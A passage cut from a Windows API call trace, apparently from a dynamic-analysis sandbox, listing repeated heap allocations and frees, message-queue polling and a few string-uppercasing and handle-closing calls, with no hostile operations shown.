hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0255.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0255.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0255.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0255.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0255.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0255.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0255.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0255.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0255.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0255.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0255.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0255.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0255.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0255.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0255.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0255.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0255.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0255.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0255.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0255.232] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0255.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0255.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0255.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0255.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0255.233] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0255.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0255.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa158 [0255.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0255.233] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0255.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0255.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0255.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0255.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0255.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0255.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0255.235] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0255.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0255.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0255.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0255.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0255.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0255.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0255.236] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0255.236] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0255.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0255.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0255.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0255.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0255.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0255.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0255.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0255.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0255.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0255.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0255.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0255.237] FreeLibrary (hLibModule=0x74d40000) returned 1 [0255.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0255.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0255.237] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0255.237] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0255.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.238] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0255.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0255.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0255.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0255.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0255.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0255.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0255.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0255.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0255.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0255.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0255.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0255.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0255.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0255.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95b8 [0255.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0255.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa158 [0255.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0255.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa9b0 [0255.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0255.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0255.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0255.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0255.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0255.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0255.241] CloseHandle (hObject=0x1f8) returned 1 [0255.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0255.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0255.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0255.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0255.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0255.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0255.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0255.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0255.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0255.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0255.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0255.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0255.245] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0255.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0255.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0255.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0255.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0255.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0255.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0255.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0255.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0255.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0255.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0255.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0255.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0255.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0255.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa9b0 [0255.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa158 [0255.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa200 [0255.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0255.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95b8 [0255.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0255.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0255.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0255.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0255.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.247] CloseHandle (hObject=0x294) returned 1 [0255.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0255.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0255.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0255.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0255.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0255.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0255.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0255.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0255.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0255.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0255.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0255.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0255.254] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0255.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0255.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0255.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0255.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0255.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0255.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0255.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0255.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0255.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0255.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0255.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0255.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0255.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0255.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0255.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0255.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0255.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0255.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0255.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0255.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0255.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0255.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0255.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0255.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0255.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0255.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0255.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0255.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0255.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0255.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0255.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0255.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0255.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0255.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0255.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0255.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0255.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0255.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0255.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0255.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0255.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0255.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0255.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0255.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0255.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0255.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0255.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0255.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0255.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0255.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0255.257] 